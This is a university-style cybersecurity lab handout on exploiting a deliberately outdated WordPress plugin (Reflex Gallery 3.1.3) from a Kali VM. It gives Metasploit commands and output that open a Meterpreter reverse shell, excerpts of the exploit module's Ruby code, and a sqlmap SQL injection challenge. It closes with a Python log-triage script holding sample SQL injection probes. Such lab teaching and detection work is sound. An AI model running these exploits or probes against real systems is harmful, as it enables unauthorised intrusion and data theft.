Cyber Security: Kali Linux Lab
I have a Lab assignment that has to do with Kali Linux.
You'll have to watch 2 walkthrough videos:
The first video is regarding setting up Kali Linux
The second video is regarding setting up WordPress.
Once you successfully watch the two videos, you will then start the lab. The procedures of the lab are in the attachment section.
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 1/13
Week 8 Lab Exercises: WordPress vs. Kali, Round 2
Last week, we started working with Vagrant and WPDistillery, running WordPress and Kali in separate VMs, and using the wpscan tool to probe an older version of WordPress for weaknesses…and exploit them. Hopefully, you were able to find some interesting exploits to understand how the types of vulnerabilities we looked at over the first six weeks, such as XSS and SQLI, actually work in the wild.
This is only the beginning, though. As proofs-of-concept, many specific web vulnerabilities like XSS only require a simple demonstration, such as a harmless JavaScript alert or some minor modification to an HTML page. Like a single link in a chain, they aren’t very interesting in isolation, but when combined with other links, these vulnerabilities can be wielded to great effect. Like martial arts students, we begin with the rudiments — simple moves, both attacks and blocks — before we can understand how these are combined into a repertoire of skills.
In practice, the offensive goal is usually achieving the highest level of access possible. The defensive goal is, if not to block the attack outright, to at least contain the damage by limiting the attacker’s access. Nobody plans for their user database to get stolen, but one still hashes and salts passwords anyway, because pwning happens. This week, we’re going to look at how specific exploits become full-blown attacks — and what can be done to stop them.
This week’s lab builds on the previous one in that we’ll be using the previous WP/Kali setup via Vagrant/VirtualBox. We’ll cover some of the same steps again, but refer to last week’s instructions (https://courses.codepath.org/courses/cybersecurity_university/unit/7#!module) if you need more of a refresher.
First, you’ll need to make sure you have the VirtualBox VMs set up in the same way as last week’s lab:
Running in VirtualBox
Logged into desktop
Provisioned via Vagrant / WPDistillery
Running version 4.2
If you are running a version other than 4.2 or if you break your WordPress server during an exploit, you can destroy the current WP instance and remove web content:
Linux and macOS
cd $HOME/WPDistillery
vagrant destroy --force
Enter password for sudo if asked, then delete WordPress content.
rm -rf public
Windows PowerShell (As Administrator)
cd $HOME\WPDistillery
vagrant destroy --force
Remove-Item -Recurse -Force .\public\
All Hosts
Edit wpdistillery/config.yml and change the following value:
# WordPress version
wpversion: 4.2
Start it back up.
vagrant up
Saving Progress: Whenever you need a break from hacking WordPress, you can gracefully shutdown the server using vagrant halt . Whenever you wish to resume, use vagrant up to start the server. Make sure you are in the WPDistillery directory when entering the commands (Hint: cd $HOME/WPDistillery ).
Milestone 0: Preparing the Playing Field
Before going further, shutdown the WordPress server using vagrant halt on the command line and shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.
Open a Hole
There’s one more step required for this lab. Because VirtualBox places specific networking restrictions on VMs, we need to configure VirtualBox to allow communication between the Kali VM and the WordPress VM in order to execute a more sophisticated attack.
First, you need to determine the host-only adapter used by the WPDistillery VM. In the VirtualBox client, click on the WPDistillery VM so its information is displayed in the detail pane, and then look at the details under Network. Two adapters should be listed: one “NAT” and one “Host-Only Adapter” with a qualifier like vboxnet0 — that is the host-only network in use, so make a note of it.
Next, you’ll need to set up a DHCP server for that network — this will allow automatic assignment of IP addresses. Go to the Host Network Manager in VirtualBox (via the File menu). When the Host Network Manager dialog comes up:
Bug Alerts: Deleting and re-creating the host-only adapter during step 1 (below) is necessary in order for Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in the 192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes twice when setting up DHCP, so double-check the numbers before closing the dialog.
1. Highlight the host-only network you identified in the previous step, delete it and then re-create it, then click on the Properties button at the top of the dialog.
2. When the nested dialog appears, click on the DHCP Server tab and set the following fields:
☑ Enable Server
Server Address: 192.168.33.2
Server Mask: 255.255.255.0
Lower Address Bound: 192.168.33.100
Upper Address Bound: 192.168.33.200
Click Apply and Close to apply these changes and exit. Restart the WPDistillery VM using the command line ( vagrant up ) and confirm the WordPress site is still accessible via wpdistillery.vm .
Now, back in the VirtualBox client, click on the Kali VM. If it is running, power it down (right-click on the VM, Close >> Power Off). Then in the Kali VM settings (right-click on the VM, Settings), add a second adapter pointing to the same host-only network:
1. Click on Network
2. Click on Adapter 2 and set the following fields:
☑ Enable Network Adapter
Attached to: Host-only Adapter
Name: specify the host-only adapter modified in the previous step
3. Click OK
4. Start the Kali VM (right-click on the VM, Start >> Normal Start)
5. Open a terminal and run the following command to remove the default network profiles and reboot Kali:
In Kali Terminal, run: sudo rm /etc/NetworkManager/system-connections/* ; sudo reboot
6. After Kali reboots, log back in and confirm that you have 3 interfaces by opening a Terminal and running ip addr :
lo (loopback) with IP address of 127.0.0.1
eth0 (NAT) with IP similar to 10.x.x.x
eth1 (Host-only) with IP of 192.168.33.100
7. Verify connectivity to your WordPress server and the Internet from Kali.
ping google.com
ping wpdistillery.vm or ping 192.168.33.10
End the pings with Ctrl + C
If the setup was successful, both Kali and WordPress should have access to 2 networks now. One is used for Internet access in order to facilitate downloading of WordPress plugins and Kali attack tools. The other network doesn’t have Internet access, but is only a network of the VMs that are connected to it. This latter network is the one that’ll be used as a safe sandbox for practicing our exploits.
Milestone 1: Opening an Attack Surface
Our first victim is a WordPress plugin for displaying image galleries called Reflex Gallery.
1. In the WP admin console, go to Plugins -> Add New (http://wpdistillery.vm/wp-admin/plugin-install.php)
2. Search for reflex gallery and you should see ReFlex Gallery » WordPress Photo Gallery
3. Click on the result but don’t install the plugin yet. Look at the Changelog tab for any critical security issues that were patched and install the version just before it was patched.
4. On the right side of the dialog, where it lists the compatibility and installs data, click the WordPress.org Plugin Page » link
5. You’ll be taken to the official WP plugin page. Click on the Development tab
6. Click Advanced View
7. Under Previous Versions, download the 3.1.3 zip file (https://downloads.wordpress.org/plugin/reflex-gallery.3.1.3.zip)
8. In the WordPress admin console, go to Plugins -> Add New -> Upload Plugin (http://wpdistillery.vm/wp-admin/plugin-install.php?tab=upload), specify the zip file you downloaded, then click Install Now
9. Go to the admin console plugins page (http://wpdistillery.vm/wp-admin/plugins.php), find the plugin, and click Activate
Challenge: Beyond activating the plugin, you need to use it in a page or a post on the WP instance. Create a gallery and use it in a page before proceeding.
Milestone 2: Recon
The following steps should be run in the Kali VM’s Terminal emulator.
So we know the blog is accessible from the host OS and Kali VM at wpdistillery.vm , which is simply a local IP aliased via the /etc/hosts file. Let’s re-run wpscan against the URL:
wpscan --url http://wpdistillery.vm --random-agent
The output should include the vulnerability associated with Reflex Gallery:
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
    Reference: https://wpvulndb.com/vulnerabilities/7867
    Reference: http://packetstormsecurity.com/files/130845/
    Reference: http://packetstormsecurity.com/files/131515/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
    Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_
    Reference: https://www.exploit-db.com/exploits/36374/
[i] Fixed in: 3.1.4
Arbitrary File Upload. Sounds promising. At this point, we could dig in, research the source code, and come up with a carefully-crafted demonstration of the specific, underlying exploit. But instead of that, let’s just go right for the throat and attack this with a sledgehammer.
Milestone 3: Hello, Metasploit
Metasploit is an exploitation framework. One of the most popular tools in Kali, it’s the free part of a larger, commercial project used widely in web security penetration testing. And by hackers. If wpscan is a dental pick, Metasploit is a set of carving knives.
Metasploit currently has over 1600 exploits, organized in different categories like:
Browser-based: a large collection of (mostly) remote code execution exploits
Mobile: Android, iOS
OS-specific: Linux, Windows, Solaris, etc.
Combinations of the above
Metasploit currently has hundreds of payloads. Some of them are:
Command shells, enabling attackers to run scripts or arbitrary commands against a host
Meterpreter payloads, enabling attackers to control the screen of a device using VNC and to browse, upload and download files
Dynamic payloads, enabling attackers to evade anti-virus defenses by generating unique payloads
For this attack, we’ll be using Meterpreter to open a shell into the target machine. Read more about Meterpreter here: https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
Metasploit uses a database to manage exploit/payload information and also attack data. So you need to initialize the DB, then load the console:
sudo service postgresql start
sudo msfdb init
msfconsole
Fun fact: you get different ASCII art every time. And they say hackers don’t care about UX. Note the command prompt has changed to msf5 > . You are now in a shell within another shell within a VM.
In the snippets below, the > character denotes the end of the prompt (similar to how $ is used to denote a non-root user’s bash prompt). For example, msf5 > is the MSF prompt. The commands to enter will follow the > in most of the examples below.
First check that the DB is connected OK. The DB isn’t strictly necessary but MSF runs faster with it.
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
Now we’re ready.
Milestone 4: Pwnage
In MSF, start by searching the exploit database for something related to the plugin affected by the vulnerability. You could search on several different terms to find something, but in this case, the plugin has an unusual word in its name, “Reflex”.
Enter search Reflex into MSF:
msf5 > search Reflex
[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   exploit/unix/webapp/wp_reflexgallery_file_upload  2012-12-30       excellent  WordPress
Well, that sure looks handy. It’s even ranked excellent, which should suggest to you that not all of these tools are created equal. Some work better than others; some don’t work at all. In fact, what follows may not work perfectly for you, so don’t be too surprised if it doesn’t go swimmingly. These are hacks, after all: user-supported code and scripts whose primary purpose is to compromise systems, so robustness isn’t exactly a guarantee. Give it a shot, but be prepared for some possible difficulty ahead.
The command to use the exploit is unsurprisingly called use and takes the exploit’s name as an argument. Once loaded, the command prompt changes again, and you can run the info command.
msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(wp_reflexgallery_file_upload) > info
Notice the output lists the affected version and some options we’ll need to set:
Available targets:
  Id  Name
  --  ----
  0   Reflex Gallery 3.1.3
Check supported:
  Yes
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:p
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host
Payload information:
Description:
  This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
Use the set command to specify RHOST accordingly. If your blog isn’t hosted at the root ( / ), you could additionally pass in the path by setting TARGETURI (but the WpDistillery setup should work with the default).
msf5 exploit(wp_reflexgallery_file_upload) > set RHOST wpdistillery.vm
RHOST => wpdistillery.vm
Before we can run the exploit, we need to specify the LHOST, i.e. which IP address Kali (localhost) should receive a shell on. The default might be in the NAT network, in which case the exploit will work but no session will be opened. To ensure that we get a shell back on the host-only adapter’s IP address, we will set it explicitly.
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.33.100
LHOST => 192.168.33.100
You can probably guess the command used to finally run the exploit (it’ll take a minute to run):
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
[*] Started reverse TCP handler on 192.168.33.100:4444
[+] Our payload is at: mcxgHJixsWZpS.php. Calling payload…
[*] Calling payload…
[*] Sending stage (38288 bytes) to 192.168.33.10
[*] Meterpreter session 1 opened (192.168.33.100:4444 -> 192.168.33.10:51778) at 2020-10-11
[+] Deleted mcxgHJixsWZpS.php
meterpreter >
Having problems? See the Troubleshooting section at the end of this milestone.
Notice the command prompt changed to meterpreter > . The meterpreter payload ( mcxgHJixsWZpS.php ) was uploaded, executed, then deleted (just like campers, hackers should leave no trace), and now we have a connection to the target machine. Run the shell command when you see the meterpreter > prompt to load a new shell:
meterpreter > shell
Process 5315 created.
Channel 0 created.
A shell within a shell within a shell. But this shell is different; this shell is running on the WordPress VM. In case it’s not clear, you really shouldn’t be able to do that. Notice the new shell spawned by Meterpreter doesn’t bother with command prompts at all, so it might just look like nothing’s happening after the process and channel are created. Try running some commands, like whoami and pwd :
whoami
www-data
pwd
/var/www/public/wp-content/uploads/2020/10
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
exit
meterpreter >
Lines 2, 4, and 6 in the above snippet are output. It’s a low-fi shell, and somewhat limited, but it works, and it’s enough to compromise the whole machine. We can see we’re shell’d in as the www-data user and presently in one of the WordPress upload directories, which is where the malicious PHP payload was delivered.
The exit command on line 7 above gets us back to the meterpreter > prompt, which has fewer but more usable commands than the shell. For instance, we can poke around with pwd , cd , ls , and cat :
meterpreter > pwd
/var/www/html/wp-content/uploads/2017/03
meterpreter > cd ../../..
meterpreter > pwd
/var/www/html/wp-content
meterpreter > ls
Listing: /var/www/html/wp-content
=================================
Mode Size Type Last modified Name
—- —- —- ————- —-
100644/rw-r–r– 29 fil 2017-03-18 19:01:59 +0000 index.php
40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 plugins
40755/rwxr-xr-x 4096 dir 2017-03-16 20:06:21 +0000 themes
40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 upgrade
40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 uploads
meterpreter > cat index.php
Troubleshooting
Meterpreter may fail to establish a connection after running exploit in Metasploit. This might be a one-off error, but if you can’t get it to work, here are a few alternatives you can try:
The whole setup can be simplified by bypassing the Kali VM and simply installing Metasploit to your host machine and running the same instructions from within Metasploit on your host machine. We don’t recommend this approach unless the above doesn’t work for you, for the simple reason that it’s not a great idea to install hacking tools on to your host system. By having things like Metasploit and vulnerable WordPress versions contained within VMs, any risks can be compartmentalized and easily cleaned up. That said, there’s nothing especially dangerous about installing Metasploit to your host system, but if you do install it, we’d recommend you remove it after the course is done.
As an alternative workaround to the above that still uses the Kali VM, you can set up port-forwarding through localhost. In VirtualBox, stop your Kali VM, open its Settings, and under Network, disable Adapter 2 (as created in Milestone 0), then switch back to Adapter 1 and click Port Forwarding. Click the Add button at right and use the following settings:
Name: metasploit
Protocol: TCP
Host IP: 127.0.0.1
Host Port: 4444
Guest IP: (leave blank)
Guest Port: 4444
Click OK and restart Kali. Then, in Metasploit, load the exploit (via use ), set LHOST to your host PC’s IP address (not the VM IP) and LPORT to 4444 , then try exploit again.
Milestone 5: Tag it
Challenge: Make a change to the WP content. You can open a vi editor from meterpreter > using the edit command; see the Meterpreter Cheat Sheet for examples: https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/
And that’s pretty much game over for this scenario. Once an attacker is able to gain this level of access, a whole universe of options suddenly opens up. If the machine is configured appropriately, those options may be limited, but this is not a position any sysadmin wants to be in, even with everything configured perfectly. In the best case scenario, the attack surface available to the intruder is intolerably large.
Badge Earned: Script Kiddie
Congratulations: at this point, you are officially a script kiddie (https://en.wikipedia.org/wiki/Script_kiddie). Hopefully this has given you a sense of the power of these tools, how even a single, specific exploit affecting some random plugin can be weaponized in a way that’s frighteningly easy to use. In the above example, we just compromised the whole system, so it’s tempting to feel like there’s some real skill involved in what we’re doing here. But we’re standing on the shoulders of giants. Just go back and read more about Meterpreter (https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/):
“…an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.”
Now writing something like that takes real skill. Remember, everything available in Kali has been used extensively by others. Many of these kinds of tools started out as someone’s secret weapon of choice and gradually filtered out into the public domain. That’s not to say Kali isn’t powerful or even dangerous (it is). But the most effective, advanced attacks and tools in use today certainly aren’t bundled in Kali.
Milestone 6: Going Deeper
Nobody wants to be a script kiddie, and, sadly, in-memory DLL injection is beyond the scope of our skills at this point, but we can at least look at the exploit we just used and understand it. The link to the announcement and code for this exploit is actually listed as part of the wpscan output from Milestone 2 (rapid7 is the company that sells the commercial version of Metasploit). From there, you can get to the code for this exploit in Github (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb). It’s written in Ruby. Don’t know Ruby? Doesn’t matter. Let’s look anyway:
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper
This is the class declaration of the module and associated require / include statements pulling in the required parts of MSF. Lines 11 and 12 show the payload and its delivery mechanism are just components of MSF.
  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfi
    post_data = data.to_s
Line 47 shows how the filename of the dropped payload is created randomly, and lines 49 – 51 show how the MIME attachment (https://kb.iu.edu/d/agtj) is created and how the encoded payload is added to it as a binary data stream, which is serialized as a string for the POST request.
And here’s the multipart upload POST request, which just mimics what the browser sends to the WordPress server when the user uploads a file. The plugin accepts the binary content just as it would for an image. Note the uri value contains the components of the path to the vulnerable source in the plugin.
    res = send_request_cgi({
      'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'script
      'method' => 'POST',
      'vars_get' => {
        'Year' => "#{year}",
        'Month' => "#{month}"
      },
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })
    if res.code == 200 && res.body =~ /success|#{php_pagename}/
      print_good("Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
If the response code is OK, the module marks the uploaded file for cleanup, which happens immediately after the next step. The payload is deleted so obvious forensic evidence of the hack isn’t left on the target server.
Finally, the payload is activated via another HTTP request, which opens the Meterpreter connection.
      send_request_cgi(
        'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month
      )
One takeaway from this is that the framework, MSF, is doing all the heavy lifting here: the payload is provided (even in encoded form), activating it is a single function call, and even the cleanup is provided as a core function. All the author had to do here was create and issue a multipart POST request.
Challenge: Now that we’ve walked through the exploit, go back to the Reflex Gallery plugin code and identify the fix — specifically, what was changed in the plugin code to prevent this attack?
Hints:
The plugin is written in PHP and JavaScript — which part would this fix need to be in, and why?
Use the source browser changelog viewer (https://plugins.trac.wordpress.org/log/reflex-gallery/) to diff specific commits
If you ran the MSF exploit against the fixed version of the plugin, what specifically would fail?
Two files related to the vulnerability were substantially changed between the two versions
Milestone 7: Hello, sqlmap
If you think back to all of the Security Shepherd exercises around SQL injection, you probably noticed that finding the right combination of characters and expressions to use would very often boil down to trial and error, educated guesswork, and sometimes dumb luck. Being a coder, you may have thought it’d be nice to have a tool that automates all that guessing and testing. Say hello to our little friend sqlmap , which does exactly that: given a URL and a parameter string, this tool will attempt to identify SQLI-vulnerable parameters by systematically trying various SQLI exploits — pretty much all of them — and if it finds the right way in, it can exfiltrate an entire database.
As such, one of the tricks to using sqlmap is knowing how not to use it. In the wrong hands, it becomes an accidental load-testing tool, firing off thousands of requests from multiple threads and crashing a database. In the right hands, it can identify novel routes for exploitation.
Read the usage docs (https://github.com/sqlmapproject/sqlmap/wiki/Usage) on this one. In addition to the standard parameters, make sure you understand threads , risk , and level , which allow throttling and control how aggressively the tool will run. Try different verbosity settings to see what it’s actually doing under the hood.
Challenge: Examine this writeup about a recent SQLI vulnerability in a WP plugin (https://packetstormsecurity.com/files/139921/WordPress-Olimometer-2.56-SQL-Injection.html). Follow the same process as before to identify the affected version from the changelog, install it manually, then recreate the exploit described in the writeup using sqlmap and confirm the researcher’s results.
Hints:
Actually read the usage docs (https://github.com/sqlmapproject/sqlmap/wiki/Usage)
Expect issues, be patient. sqlmap is basically hammering your WP VM, which isn’t designed to handle a heavy load.
Look at the output carefully, even if there’s an error. Does it match the original findings?
To see what it’s doing, try running with high verbosity ( -vvvv ).
Try CTRL-C and (S)kip if something seems to hang
When in doubt, accept the default.
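As an added example (not part of the CodePath lab, Metasploit or sqlmap), here is a small Python triage script for the WordPress VM's web access log that catches the two behaviours walked through above: the upload-then-execute request pair the Reflex Gallery module issues (Milestone 6) and the bursty SQL probing sqlmap produces (Milestone 7). It assumes Apache combined log format; all sample lines are constructed, and the upload script filename is a labelled placeholder under the plugin's admin path shown in the module excerpt.

```python
"""Access-log triage for the two attack patterns this lab exercises: the
Reflex Gallery upload-then-execute pair (Milestone 6) and sqlmap-style SQLI
probing (Milestone 7). Added example, not CodePath, Metasploit or sqlmap code;
all log lines are constructed and the upload script name is a placeholder."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache combined log: ip - - [ts] "METHOD url HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    parts = urlsplit(rec["url"])
    rec["path"], rec["query"] = parts.path, parse_qs(parts.query)
    return rec

# Plugin admin path from the module's normalize_uri(...) call; the dropped .php
# lands under uploads/<Year>/<Month>/, as the lab's meterpreter pwd showed.
PLUGIN_ADMIN = "/wp-content/plugins/reflex-gallery/admin/"
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/(\d{4})/(\d{2})/[^/]+\.php$")

def find_upload_chains(records, window=timedelta(seconds=60)):
    """Flag a POST to the plugin's admin script carrying Year/Month followed by
    a request for a .php under uploads/<Year>/<Month> from the same client (the
    two requests the module issues). Any .php served from uploads is flagged too."""
    alerts, pending = [], defaultdict(list)  # ip -> [(ts, year, month)]
    for r in records:
        q = r["query"]
        if r["method"] == "POST" and r["path"].startswith(PLUGIN_ADMIN) \
                and "Year" in q and "Month" in q:
            pending[r["ip"]].append((r["ts"], q["Year"][0], q["Month"][0]))
            continue
        m = UPLOADS_PHP.match(r["path"])
        if not m:
            continue
        alerts.append(("php-in-uploads", r["ip"], r["path"]))
        for ts, year, month in pending[r["ip"]]:
            if (year, month) == m.groups() and timedelta(0) <= r["ts"] - ts <= window:
                alerts.append(("upload-then-execute", r["ip"], r["path"]))
                break
    return alerts

# Classic probe fragments sqlmap cycles through; parse_qs already percent-decodes.
SQLI_TOKENS = re.compile(r"(?i)(union\s+select|sleep\(|benchmark\(|\b(and|or)\b\s*\d+=\d+|'|--)")

def find_sqli_scans(records, min_hits=5, window=timedelta(seconds=30)):
    """Flag one client hammering one path with SQL-looking values (catches
    --random-agent runs) and sqlmap's default User-Agent string."""
    alerts, hits = [], defaultdict(list)  # (ip, path) -> [ts of suspicious hits]
    for r in records:
        if "sqlmap" in r["ua"].lower():
            alerts.append(("sqlmap-user-agent", r["ip"], r["path"]))
        values = [v for vs in r["query"].values() for v in vs]
        if not any(SQLI_TOKENS.search(v) for v in values):
            continue
        key = (r["ip"], r["path"])
        hits[key].append(r["ts"])
        if len([t for t in hits[key] if r["ts"] - t <= window]) >= min_hits:
            alerts.append(("sqli-burst", r["ip"], r["path"]))
            hits[key].clear()  # one alert per burst
    return alerts

def triage(log_text):
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    return find_upload_chains(records) + find_sqli_scans(records)

# Constructed sample: Kali (192.168.33.100) runs the module, then a sqlmap pass.
SAMPLE_LOG = """\
192.168.33.100 - - [11/Oct/2020:10:00:01 +0000] "POST /wp-content/plugins/reflex-gallery/admin/UPLOAD_SCRIPT_PLACEHOLDER.php?Year=2020&Month=10 HTTP/1.1" 200 57 "-" "Mozilla/5.0"
192.168.33.100 - - [11/Oct/2020:10:00:02 +0000] "GET /wp-content/uploads/2020/10/mcxgHJixsWZpS.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.33.1 - - [11/Oct/2020:10:01:00 +0000] "GET /wp-content/uploads/2020/10/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.168.33.100 - - [11/Oct/2020:10:05:01 +0000] "GET /?p=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.4 (http://sqlmap.org)"
192.168.33.100 - - [11/Oct/2020:10:05:02 +0000] "GET /?p=1%20AND%201%3D1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.33.100 - - [11/Oct/2020:10:05:03 +0000] "GET /?p=1%20AND%201%3D2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.33.100 - - [11/Oct/2020:10:05:04 +0000] "GET /?p=1%27%20OR%201%3D1-- HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.33.100 - - [11/Oct/2020:10:05:05 +0000] "GET /?p=1%20UNION%20SELECT%201 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""
if __name__ == "__main__":
    print(*triage(SAMPLE_LOG), sep="\n")
```

The photo.jpg request and the first four probes alone raise nothing; only the executable in uploads and the fifth probe within the window do.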